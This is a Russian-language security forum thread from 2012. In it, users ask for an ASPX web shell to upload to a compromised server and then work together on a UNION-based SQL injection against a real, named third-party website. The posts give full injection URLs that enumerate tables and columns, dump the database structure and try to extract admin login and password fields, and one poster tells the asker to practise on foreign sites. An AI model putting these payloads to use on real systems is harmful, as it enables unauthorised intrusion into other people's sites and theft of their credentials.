HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20091  
Старый 19.03.2012, 18:09
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
Вот он
 
Ответить с цитированием

  #20092  
Старый 19.03.2012, 18:27
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Вот он
так те ссылочки что оставил ettee уже не работают
 
Ответить с цитированием

  #20093  
Старый 19.03.2012, 18:55
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
так те ссылочки что оставил ettee уже не работают
Попробуй этот
 
Ответить с цитированием

  #20094  
Старый 19.03.2012, 18:59
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от aydin-ka  
та попробовать то можно но чем я заменю функцию

?
 
Ответить с цитированием

  #20095  
Старый 19.03.2012, 20:56
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+

Как вывести все поля из этой таблицы?

В title ответ
 
Ответить с цитированием

  #20096  
Старый 19.03.2012, 20:59
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от foma9999  
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где

0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
 
Ответить с цитированием

  #20097  
Старый 19.03.2012, 21:03
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от foma9999  
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
Code:
http://www.svrwheels.ru
/index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+
Ereee опередил...
 
Ответить с цитированием

  #20098  
Старый 19.03.2012, 21:09
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
Спасибо!

А как вывести структуру бд?

как тут http://i.imgur.com/5e1qH.png

UPD:

Почему

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x 52726567696f6e7341646d696e73+--+

ничего не выводит, кроме ошибки? Что не так?
 
Ответить с цитированием

  #20099  
Старый 19.03.2012, 21:21
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Структура:

Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a
По-твоему вопросу:

1. Нельзя после FROM имя таблицы в hex переводит.

2. Твоя таблица в другой базе:

Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a
3. Тебе нужно потренироватся на буржуйских сайтах.

4. Пустая таблица:

Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a
В написано, что записей "0".
 
Ответить с цитированием

  #20100  
Старый 19.03.2012, 21:26
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20selec t%20@pro:=0x2727,%20(select%20null%20from%20inform ation_schema.tables%20where%20concat(table_schema, 0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0 x2c27,table_schema,0x2e,table_name,0x27))limit%200 ,1))f),3,4,5,6,7,8,9,10--+a
что значит а после коммента?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ